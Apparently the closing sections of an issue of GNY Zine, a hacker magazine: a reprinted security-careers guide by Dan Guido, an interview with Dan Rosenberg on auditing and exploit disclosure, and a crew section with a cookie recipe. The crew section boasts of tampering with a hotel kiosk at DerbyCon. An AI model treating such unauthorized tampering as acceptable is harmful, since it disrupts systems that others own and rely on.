-=[ 0x0a Information Security Careers Cheatsheet
-=[ Author: Dan Guido
>> Note from GNY Staff:
>> Dan Guido is currently an information security professor at NYU-Poly, and originally wrote this
>> article for the students of his Penetration Testing and Vulnerability Analysis course. It is
>> being republished in GNY Zine with permission in hopes that it may reach a broader audience.
These are my views on careers in information security, based on the experience I've had, and
your mileage may vary. The information below will be most appropriate if you live in New York City,
you're interested in application security, pentesting, or reversing, and you are early on in your
career in information security.
1. Employers
2. Roles
3. Learn from a Book
4. Learn from a Course
5. University
6. Capture the Flag and War Games
7. Communication
8. Meet People
9. Conferences
10. Certifications
11. Links
12. Friends of the Class
1. Employers
=============
As far as I can tell, there are five major employers in the infosec industry (not counting
academia). This section is going to be expanded in a future post.
* The Government
* Non-Tech Fortune 500s (mostly finance)
* Big Tech Vendors (mostly West coast)
* Big Consulting (mostly non-technical)
* Small Consulting (mostly awesome)
The industry you work in will determine the major problems you have to solve. For example, the
emphasis in finance is to reduce risk at the lowest cost to the business (opportunities for large-
scale automation). On the other hand, consulting often means selling people on the idea that X is
actually a vulnerability and researching to find new ones.
2. Roles
=========
I primarily split up infosec jobs into internal network security, product security, and consulting.
I further break down these classes of jobs into the following roles:
* Application Security (code audits/app assessments)
* Attacker (offensive)
* Compliance
* Forensics
* Incident Handler
* Manager
* Network Security Engineer
* Penetration Tester
* Policy
* Researcher
* Reverse Engineer
* Security Architect
The roles above each require a different, highly specialized body of knowledge. This website is a
great resource for application security and penetration testing, but you should find other resources
if you are interested in a different role.
3. Learn from a Book
=====================
Fortunately, there are dozens of good books written about each topic inside information security.
Dino Dai Zovi [1] has an excellent reading list, as does Tom Ptacek [2], and Richard Bejtlich [3]
has recommendations from another perspective (bonus: Richard's book reviews [4] are usually
spot-on). I would personally recommend looking at:
* Gray Hat Hacking [5] (the textbook for this course)
* The Myths of Security [6] (a quick read that covers larger issues)
* Hacking: The Next Generation [7] (a quick read that covers the latest in web security and then
some)
* and any book from O'Reilly on a scripting language of your choice.
If you're not sure what you're looking for, then you should browse the selection offered by
O'Reilly [8]. They are probably the most consistent and high-quality book publisher in this
industry.
Don't forget that reading the book alone won't give you any additional skills beyond the
conversational. You need to practice or create something based on what you read to really gain value
and understanding from it.
4. Learn from a Course
=======================
If you're looking for something more hands-on and directed, there are lots of university courses
about information security available online. I listed some of the best ones that have course
materials available below (ordered by institution name). The RPI course is the most similar to this
one and Hovav gets points for the best academic reading list, but every course on this list is
fantastic.
Course Name                                           Instructor(s)         Institution
-----------                                           -------------         -----------
Computer Security [9]                                 Paxson and Wagner     Berkeley [10]
Software Security [11]                                David Brumley         CMU [12]
Hacking Exposed [13]                                  Rohyt Belani [14]     CMU
Software Security Assessment [15]                     Gregory Ose           DePaul [16]
Intro to Web Application Security [17]                Edward Z. Yang [18]   MIT IAP 2009 [19]
Intro to Software Exploitation [20]                   Nathan Rittenhouse    MIT IAP 2009
Advanced Vulnerability Assessment                     Chris Eagle [21]      NPS [22]
Secure Software Principles [23]                       various, see website  RPI [24]
Web Programming and Security [25]                     unknown               Stanford [26]
Computer and Network Security [27]                    unknown               Stanford
Advanced Topics in Security [28]                      Giovanni Vigna [29]   UCSB [30]
Computer Security (Graduate) [31]                     Hovav Shacham [32]    UCSD [33]
UNIX Security Holes [34]                              DJB [35]              unknown
Binary Auditing and Reverse Code Engineering [36]     unknown               University of Bielefeld [37]
Malware Analysis and Antivirus Technologies [38, 39]  unknown               University of Helsinki [40]
5. University
==============
The easiest shortcut to finding a university with a dedicated security program is to look through
the NSA Centers of Academic Excellence [41] (NSA-CAE) institution list. This certification has
become watered down as more universities have obtained it and it might help to focus your search on
those that have obtained the newer CAE-R certification [42]. Remember, certifications are only a
guideline. You should look into the actual programs at each university instead of basing your
decision on a certification alone.
Once in university, take classes that force you to write code in large volumes to solve hard
problems. IMHO the courses that focus on mainly theoretical or simulated problems provide limited
value. Ask upper level students for recommendations if you can't identify the CS courses with
programming from the CS courses done entirely on paper. The other way to frame this is to go to
school for software development rather than computer science.
6. Capture the Flag and War Games
==================================
If you want to acquire and maintain technical skills and you want to do it fast, play in a CTF or
jump into a wargame. The one thing to note is that many of these challenges attach themselves to
conferences (of all sizes), and by playing in them you will likely miss the entire rest of the
conference. Try not to overdo it; conferences are useful in their own way (see below).
* CSAW CTF [43] (as well as the reversing challenges from 2009 [44])
* UCSB iCTF [45]
* Defcon CTF Pre-qualifications [46]
* wargames at smashthestack.org [47]
* wargames at intruded.net [48]
* calendar of upcoming CTF competitions at [49]
There are some defense-only competitions that disguise themselves as normal CTF competitions, mainly
the Collegiate Cyber Defense Challenge (CCDC) and its regional variations, and you should avoid
them. They are exercises in system administration and frustration and will teach you little about
security or anything else. They are incredibly fun to play as a Red Team though.
7. Communication
=================
In any role, the majority of your time will be spent communicating with others, primarily through
email and meetings and less by phone and IM. The role/employer you have will determine whether you
speak more with internal infosec teams, non-security technologists, or business users. For example,
expect to communicate more with external technologists if you do network security for a financial
firm.
Tips for communicating well in a large organization:
* Learn to write clear, concise, and professional email.
* Learn to get things done [50] and stay organized. Do not drop the ball.
* Learn the business that your company or client is in. If you can speak in terms of the
business, your arguments to a) not do things, b) fix things, and c) do things that involve
time and money will be much more persuasive.
* Learn how your company or client works, i.e., key individuals, processes, or other motivators
that factor into what gets things done.
If you are still attending a university, as with CS courses, take humanities courses that force you
to write.
8. Meet People
===============
* CitySec - informal meetups without presentations, once monthly, occurs in most cities (NYSEC,
google for others) [51]
* OWASP - formal meetups with presentations about web security, usually quarterly (OWASP NY/NJ)
[52, 53]
ISSA [54] and ISC2 focus on policy, compliance and other issues that will be of uncertain use for a
new student in this field. Similarly, InfraGard [55] mainly focuses on law enforcement-related
issues.
9. Conferences
===============
If you've never been to an infosec conference before, use the google calendar below to find a low-
cost local one and go. There have been students of mine who think that attending a conference will
be some kind of test and put off going to one for as long as possible. I promise I won't pop out of
the bushes with a final exam and publish your scores afterward.
* Information Security Conferences Calendar at [56]
If you go to a conference, don't obsess over attending a talk during every time slot. The talks are
just bait to lure all the smart hackers to one location for a weekend: you should meet the other
attendees! If a particular talk was interesting and useful then you can and should talk to the
speaker. This post by Shawn Moyer at the Defcon Speaker's Corner has more on this subject. [57]
If you're working somewhere and are having trouble justifying conference attendance to your company,
the Infosec Leaders blog has some helpful advice. [58]
10. Certifications
===================
This industry requires specialized knowledge and skills, and studying for a certification exam will
not help you gain them. In fact, in many cases, it can be harmful because the time you spend
studying for a test will distract you from doing anything else in this guide.
That said, there are inexpensive and vendor-neutral certifications that you can reasonably obtain
with your current level of experience to help set apart your resume, like the Network+ [59] and
Security+ [60] or even a NOP [61], but I would worry about certifications the least in your job
search or professional development.
In general, the two best reasons to get certifications are:
1. If you are being paid to get certified, through paid training and exams or sometimes through
an automatic pay raise after you get the certification (common in the government).
2. If your company or your client is forcing you to get certified. This is usually to help with a
sales pitch, i.e., "You should hire us because all of our staff are XYZ certified!"
11. Links
==========
* Information Security Leaders Blog
http://www.infosecleaders.com/
* Advice for Computer Science College Students
http://www.joelonsoftware.com/articles/CollegeAdvice.html
* Organizing and Participating in Computer Network Attack and Defense Exercises
http://www.nps.edu/video/portal/Video.aspx?enc=Fvcj9jTKwtwcxg2Wgv3NOEGEdfe6jktD
* Kill Your Idols, Shawn Moyer's reflections on his first years at Defcon
http://defcon.org/html/links/dc-speakerscorner.html
* Reddit comments about this post
http://www.reddit.com/r/netsec/comments/cc4ye/information_security_careers_cheatsheet/
* Hacker News comments about this post
http://news.ycombinator.com/item?id=1409735
* Forensic Engineering: Is It For You?
http://www.todaysengineer.org/2010/Nov/forensic-engineering.asp
* The answer to "Will you mentor me?" is .... no.
http://pindancing.blogspot.com/2010/12/answer-to-will-you-mentor-me-is.html
* My Canons of (ISC)2 Ethics
https://infosecisland.com/blogview/15450-My-Canons-on-ISC-Ethics-Such-as-They-Are.html
* Not a CISSP
http://www.veracode.com/blog/2008/04/not-a-cissp/
* (ISC)2's Newest Cash Cow
http://www.veracode.com/blog/2008/09/isc2s-newest-cash-cow-csslp/
12. Friends of the Class
=========================
* Attack Research
http://www.attackresearch.com/
* Harris: Crucial Security
http://www.govcomm.harris.com/solutions/segments/Cyberspace-Security-Services.asp
* Gotham Digital Science
http://www.gdssecurity.com/
* Intrepidus Group
http://intrepidusgroup.com/
* iSEC Partners
https://www.isecpartners.com/
* MANDIANT
http://www.mandiant.com/
* Matasano Security
http://www.matasano.com/
* TippingPoint DVLabs
http://dvlabs.tippingpoint.com/
* Vulnerability Research Labs
http://www.vrlsec.com/
* zero(day)solutions
http://zerodaysolutions.com/
* ThreatGrid
http://threatgrid.com/
There are a number of internal security and product security teams that I've worked with in the past
who I'm not sure would appreciate being called out like this. Needless to say, there are dozens of
financials, healthcare, and technology companies in NYC that require information security to run
their businesses and they shouldn't be hard to find.
[1] http://www.amazon.com/A-Bug-Hunters-Reading-List/lm/R21POHD6Y2DOLQ
[2] http://www.amazon.com/lm/R2EN4JTQOCHNBA/ref=cm_lm_pthnk_view
[3] http://www.amazon.com/gp/richpub/listmania/byauthor/A2ZVOU9X5W2S47
[4] http://www.amazon.com/gp/cdp/member-reviews/A2ZVOU9X5W2S47/ref=cm_pdp_rev_all
[5] http://www.amazon.com/Gray-Hat-Hacking-Second-Handbook/dp/0071495681
[6] http://www.amazon.com/Myths-Security-Computer-Industry-Doesnt/dp/0596523025
[7] http://www.amazon.com/Hacking-Next-Generation-Animal-Guide/dp/0596154577
[8] http://oreilly.com/pub/topic/security
[9] http://www-inst.eecs.berkeley.edu/~cs161/sp10/
[10] http://berkeley.edu/
[11] http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/
[12] http://www.cmu.edu/index.shtml
[13] http://www.heinz.cmu.edu/academic-resources/course-results/course-details/index.aspx?cid=360
[14] http://www.heinz.cmu.edu/faculty-and-research/faculty-profiles/faculty-details/index.aspx?faculty_id=397
[15] http://www.cdm.depaul.edu/academics/Pages/classinfo.aspx?ofid=992&ClassNbr=35086&Term=20103
[16] http://www.depaul.edu/
[17] http://stuff.mit.edu/iap/2009/websecurity/
[18] http://www.thewritingpot.com/
[19] http://web.mit.edu/
[20] http://stuff.mit.edu/iap/2009/exploit/
[21] http://www.nps.edu/AboutNPS/Centennial/Technology/Notables/ChrisEagle.html
[22] http://www.nps.edu/
[23] http://www.cs.rpi.edu/academics/courses/spring10/csci4971/
[24] http://www.rpi.edu/
[25] http://crypto.stanford.edu/cs142/
[26] http://www.stanford.edu/
[27] http://crypto.stanford.edu/cs155/
[28] http://www.cs.ucsb.edu/~vigna/courses/cs279/
[29] http://www.cs.ucsb.edu/~vigna/
[30] http://www.ucsb.edu/
[31] http://www-cse.ucsd.edu/classes/wi09/cse227/
[32] http://www-cse.ucsd.edu/~hovav/
[33] http://www.ucsd.edu/
[34] http://cr.yp.to/2004-494.html
[35] http://cr.yp.to/
[36] http://thorsten.techfak.uni-bielefeld.de/
[37] http://www.uni-bielefeld.de/International/
[38] https://noppa.tkk.fi/noppa/kurssi/t-110.6220/etusivu
[39] http://www.tml.tkk.fi/Opinnot/T-110.6220/2008/
[40] http://www.helsinki.fi/university/
[41] http://www.nsa.gov/ia/academic_outreach/nat_cae/institutions.shtml
[42] http://www.nsa.gov/ia/academic_outreach/nat_cae/cae_r_program_criteria.shtml
[43] http://www.poly.edu/csaw2011
[44] https://github.com/s7ephen/CSAW_2009
[45] http://ictf.cs.ucsb.edu/
[46] http://www.ddtek.biz/
[47] http://www.smashthestack.org/
[48] http://www.intruded.net/
[49] http://capture.thefl.ag/calendar/
[50] http://www.amazon.com/Getting-Things-Done-Stress-Free-Productivity/dp/0142000280
[51] http://www.sockpuppet.org/nysec/
[52] http://www.owasp.org/index.php/Category:OWASP_Chapter
[53] http://www.owasp.org/index.php/NYNJMetro
[54] https://www.issa.org/Chapters/Chapter-Directory.html
[55] http://www.infragard.net/chapters/index.php?mn=3
[56] http://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc%40group.calendar.google.com
[57] http://defcon.org/html/links/dc-speakerscorner.html#idols-moyer
[58] http://www.infosecleaders.com/2010/03/career-advice-tuesday-making-the-case-for-conference-attendance/
[59] http://www.comptia.org/certifications/listed/network.aspx
[60] http://www.comptia.org/certifications/listed/security.aspx
[61] http://www.immunitysec.com/services-cnop.shtml
[==================================================================================================]
-=[ 0x0b Interview with Dan Rosenberg (bliss)
As a security researcher, what are the most common bugs you find (exploitable or non-exploitable)?
All the old favorites are still very much alive and well. In low-level code, I tend to see a
lot of integer-related issues (signedness bugs, overflow/underflow, etc.), array indexing
problems, and even classic heap or stack buffer overflows. Race conditions and other
filesystem-related issues (such as symlink or hard link problems) are also a favorite bug class
of mine, and it's surprising how frequently they turn up in production code. However, my
favorite vulnerabilities tend to be issues that aren't so easily categorized, such as some of
the more esoteric issues that may occur in kernel code.
Do you commonly use fuzzers when auditing code, or just code review?
It depends on the target. For some targets, such as media players, document viewers, and web
browsers, fuzzing is the easiest way to produce a high volume of exploitable bugs. However, I
tend to personally prefer auditing code for vulnerabilities. Virtually all of my kernel bugs
have been found by auditing code, not fuzzing.
When performing a code review, are there portions of code you generally draw your attention to
first, or is it mostly a free for all?
Definitely. I tend to prefer an auditing strategy where I start looking at a code path at the
moment untrusted user input comes into contact with it, and trace through execution flow from
there to evaluate code that touches that input. As a result, I'll usually start by looking at
the most exposed components of an application or system - code that handles filesystem data,
networking data, system calls if it's a kernel, etc. Other times it's possible to find bugs by
simply looking for vulnerable code constructs regardless of context and determining after-the-
fact if it's possible to trigger that code, but I don't really recommend this for people just
starting out. It's a common beginner mistake to spend a lot of time identifying a piece of code
that looks vulnerable, but turns out to never be triggerable by external input.
Where do you currently work, and what kind of work do you do?
I currently work for VSR, a consultancy in Boston, MA. As part of my job, I deliver a pretty
wide range of security services, including application and network penetration testing, code
review, host hardening, and security training. In addition to my client-facing work, I'm lucky
to have some time to conduct research of my choice.
Outside of the security realm, do you have any other hobbies?
Music is a big part of my life - I play piano, guitar, violin, and whatever else is lying
around. I also enjoy getting outside (gasp!) and lifting heavy things up and down.
Having recently given a kernel hacking talk at DEF CON 19, how do you feel your presentation was
received by the audience, and hacking community as a whole?
I was happy with how the talk was received at the conference. Everyone there seemed genuinely
interested in what I had to say and gave positive feedback, which was nice. I've gotten some
solid constructive criticism since giving the talk, which is important to me, since I consider
the exploit and this research to be works in progress.
When developing your ROSE exploit, how long did it take to go from EIP to shell?
Hmm...well, I do remember that it took me about 15 minutes to go from finding the bug to getting
EIP. The rest of the exploit was *much* more work, due to the potential complexity of kernel
payloads. I think I got my first shell for that exploit about a week or two after I started
working on it, but keep in mind that this was all done in my free time.
What is your opinion on the merit and legitimacy of security certifications?
I think it depends. I'm not certified in anything, and that's never held me back. I don't put
a lot of stock in their value as actual proof of expertise in security, but some companies take
them seriously. If a certification is what distinguishes you from the rest of the pack in the
eyes of a potential employer, then it's probably worth it, but it depends on the company and the
position you're looking at. I would personally rather see demonstrable skills than a piece of
paper, but the industry doesn't necessarily agree.
What do you see as some of the main challenges facing the security industry today (both technical
and non-technical)?
Especially given the recent compromises of Comodo and DigiNotar, solving the problems associated
with SSL (namely the centralized trust placed in CAs) will be a difficult but essential step in
ensuring privacy on the Internet. I don't think this is a problem that's going to go away, so
we've got a lot of work to do as a community.
What do you see as some of the main challenges facing the hacking community today (both technical
and non-technical)?
I'm concerned that the increased media attention towards so-called "hacktivist" organizations
(you know the ones I mean) will cause an increase in government regulation on our ability to
freely access the Internet and other digital services. I think it's critical that everyone
remains aware of these issues, and that the hacking community makes its voices heard by those
seeking to impinge upon the free flow of information.
What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you
believe in full disclosure, and should security researchers notify affected vendors prior to their
announcements?
My opinion is that it's a waste of time debating disclosure of vulnerabilities. It's a debate
based almost entirely on feelings and personal values rather than facts. The short version is,
I don't know what the right answer is, and neither does anyone else. My policy is to let people
do what they feel is right with their own bugs, whether that means dropping them to a mailing
list or keeping them private.
As for publishing exploits, I've gone from one end of the spectrum to the other. I think
publishing exploits can be valuable, especially in the face of an unresponsive vendor. I also
think there is value in providing public examples of exploitation techniques to raise awareness
and motivate the development of practical exploit mitigation technologies. That being said, I've
come to terms with the fact that the publication of weaponized exploits for vulnerabilities in
widely used software directly contributes to real-world exploitation, especially by script
kiddies who wouldn't otherwise have the means. While I've published exploits in the past, my
current opinion is that the cost to innocent users is too high. As a result, my current policy
is to only publish an exploit if I do not think it poses a risk of widespread abuse - recent
examples include my Linux kernel exploits for DEC Alpha and ROSE packet radio. These examples
are useful in that they present new exploitation techniques or provide a vehicle to discuss
topics such as remote kernel exploitation, but they are unlikely to be abused by script kiddies.
Do you have any advice for aspiring hackers and security researchers, regarding education and
gaining experience in the field?
Having an eagerness to learn and being able to conduct self-motivated research are probably the
most important qualities for any aspiring hacker. The amount of freely available learning
material is staggering, and knowing how to properly research a topic is essential to accessing
this wealth of knowledge. If you come across something you're interested in and you don't know
how it works, look it up! None of this stuff is magic; it just takes patience and a willingness
to learn in order to understand. If you can't find a tool to accomplish your goal, write one
yourself. Every project you take on will hopefully teach you something new you can add to your
arsenal.
[==================================================================================================]
-=[ 0x0c Et Cetera, Etc.
-=[ Author: teh crew
For those of you unlucky enough to miss it, the first DerbyCon was a couple of months ago and is
without a doubt one hell of a new addition to the many hacker conferences today. A mix of friendly,
high-profile speakers and a reasonable number of attendees proved to create an intimate conference,
where it was easy to spot and get to know many of the speakers.
On that note, we would like to personally apologize to HD Moore for approaching him, pretending to
be gay, and asking him if he'd like to dance at the Dual Core party. From the bottom of our hearts.
[01:08] * &OrderZero is stuck
[01:09] * &OrderZero in an endless loop of pelvic thrusting
We would also like to apologize to the DerbyCon staff, who expressed their thanks at the closing
ceremony for no one messing with the hotel kiosk. Of course, we immediately headed downstairs and
replaced the airline lookup service with an endless nyan cat. For that, we are also sorry.
Actually, not really, but whatevz.
And with that, we bring you...
,+*^^*+___+++_
,*^^^^ )
_+* ^**+_
+^ _ _++*+_+++_, )
_+^^*+_ ( ,+*^ ^ \+_ )
{ ) ( ,( ,_+--+--, ^) ^\
{ (@) } f ,( ,+-^ __*_*_ ^^\_ ^\ )
{:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) /
( / ( ( ,___ ^*+_+* ) < < \
U _/ ) *--< ) ^\-----++__) ) ) )
( ) _(^)^^)) ) )\^^^^^))^*+/ / /
( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^
( ,/ (^))^)) ) ) ))^^^^^^^))^^) _)
*+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^
\ \_)^)_)) ))^^^^^^^^^^))^^^^)
(_ ^\__^^^^^^^^^^^^))^^^^^^^)
^\___ ^\__^^^^^^))^^^^^^^^)\\
^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\
___) >____) >___ ^\_\_\_\_\_\_\)
^^^//\\_^^//\\_^ ^(\_\_\_\)
^^^ ^^ ^^^ ^^
Chupa's Cooking Corner!
In addition to the ingredients on the back of the Nestle chocolate chips bag, you will need:
Nestle chocolate chips (of course)
Grated coconut
Cocoa powder
Wax paper
Powdered sugar or flour
Begin by following the directions on the Nestle chocolate chips bag and making the cookie dough, but
do not put in the chocolate chips. Once formed, mix in cocoa powder until the dough reaches a dark,
even brown.
Next, lay out the wax paper and cover it with a thin layer of flour or powdered sugar. Take some of
the cookie dough and form it into a sheet about 1 cm thick on the wax paper. From here, sprinkle
flour or powdered sugar on top of the dough. On one side of the dough, spread out a good 3 cm-wide
strip of chocolate chips and coconut.
Now, grabbing the wax paper, lift it up and roll the dough onto itself. It should look like a turd.
A delicious turd at that. Place this onto a cookie sheet and bake for as long as the Nestle bag
instructs, usually 10-15 minutes. Once finished baking, remove and cut into thin slices 2-3 cm
wide. Place onto another cookie sheet and chill in the refrigerator until cool.
Then enjoy. :D
----------------------------------------------------------------------------------------------------
On a serious note, though, we would like to take this opportunity to raise a worrying issue we've
noticed developing lately in the hacker scene. To put it briefly, the community as a
whole is changing in a counter-productive way. Respected, knowledge-friendly hacker communities
are dropping or going inactive faster than they are being created, and the search for other hackers
truly interested in learning is being overwhelmed by a sea of immature, impressionable teenagers
donning Guy Fawkes masks. The game is no longer about writing quality exploits, or producing
relevant research, or teaching others in a coherent manner, but instead about who can post the most
provocative Twitter messages insulting the most people. It's pretty depressing, and quite frankly,
absolutely pathetic.
So, what can you do? Start a community. Publish a magazine. Write a paper.
Teach something.
At the end of the day, that's all that matters.
No matter what you do, keep a level head and remain focused. The hacking scene was founded on a
unique mindset and an unconditional love for technology - don't lose sight of it. If you're in it
for any other reason, then something is seriously wrong. We look forward to seeing your name on the
charlatans page of Attrition.
It's getting late, so let's wrap this up. We're opening the CFP for issue 7, which is scheduled for
release in early 2012. Contact info is in the introduction, and we do respond to every email we
receive.
Stay classy, folks, and hack like it's 1999.
<3, the gny crew
irc.gonullyourself.org +6697 #gny
reddit.com/r/gny
[==================================================================================================]